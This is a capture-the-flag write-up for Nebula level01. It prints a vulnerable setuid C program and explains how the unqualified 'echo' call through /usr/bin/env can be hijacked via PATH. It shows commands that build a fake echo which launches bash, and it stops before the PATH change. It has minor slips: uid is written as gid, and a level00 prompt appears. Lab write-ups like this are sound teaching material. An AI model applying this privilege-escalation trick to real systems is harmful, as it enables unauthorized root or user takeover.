Exploit-Exercises Nebula level01
wargamesThere is a vulnerability in the below program that allows arbitrary programs to be executed, can you find it?
To do this level, log in as the level01 account with the password level01. Files for this level can be found in /home/flag01.
level1.c
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <stdio.h>
int main(int argc, char **argv, char **envp)
{
gid_t gid;
uid_t uid;
gid = getegid();
uid = geteuid();
setresgid(gid, gid, gid);
setresuid(uid, uid, uid);
system("/usr/bin/env echo and now what?");
}
Let’s take a quick look at the code. The setresgid()
and setresuid()
will set the real, effective and saved user/group ID of the calling process. Notice that the binary file has the setuid
flag set to s
as shown below.
level00@nebula~$ ls -l /home/flag01
total 8
-rwsr-x--- 1 flag01 level01 7322 2011-11-20 21:22 flag01
Therefore setresuid(gid, gid, gid)
will set real, effective and saved user ID to flag01
.
Also note that the echo
should normally be called from the shell builtin path: /bin/echo
. Since echo
command in this binary file has specified to call from /usr/bin/env
, we can use this vulnerability to our advantage by overriding the echo
command in our PATH
environment variable. This fake echo file will refresh the shell and update the userids to what setresuid()
intended.
level00@nebula~$ echo "/bin/bash" > echo
level00@nebula~$ chmod +x echo